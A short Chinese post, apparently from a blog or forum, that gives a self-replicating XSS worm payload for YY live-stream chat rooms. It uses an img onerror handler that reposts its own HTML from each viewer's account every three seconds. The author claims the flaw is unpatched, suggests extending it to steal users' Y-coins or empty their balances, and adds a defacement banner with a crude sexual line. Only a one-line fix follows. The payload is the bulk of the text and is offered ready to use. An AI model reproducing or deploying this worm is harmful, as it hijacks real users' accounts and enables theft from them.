YY直播厅蠕虫病毒代码

本来是可以直接通过<script>标签实现的，但是昨天被YY官方给屏蔽了。

下面的代码是通过img标签的onerror事件进行触发。所有看到这条消息的在线用户会被自动感染，并继续感染其他用户，因为这段代码有自我复制能力。.

 

<img height="0" width="0" src="xx" onerror='t=this;function fn(){n = $("#userName").html();$("textarea#pub_msg_input.msg-input").val(n + "说：2hY太屌X了，你就是我们的偶像," + new Date().getTime() + " " + t.outerHTML);$("#msg_send_bt").click();}setInterval(fn, 3000)'>

 

 

上面这段代码只是自动发送一条消息，稍加改造，可以盗取用户的Y币，银豆，帮用户自动下注，使用户余额清空等恶劣的破坏作用。到目前为止YY官方还未修复此漏洞，也请各位不要去做违法的事情。

 

 

 

 

 下面这段代码没有感染能力

<div style="position:fixed;top:70px;right:500px;background-color:green;z-index:1000;"><font size="20" color="red" font-weight="bold">想爆翻译妹子菊花的扣11111</font></div> 

 

 

 解决方案：

过滤 img, iframe, script等标签，对所有输出利用esapi进行编码，当然对输入利用白名单机制进行限制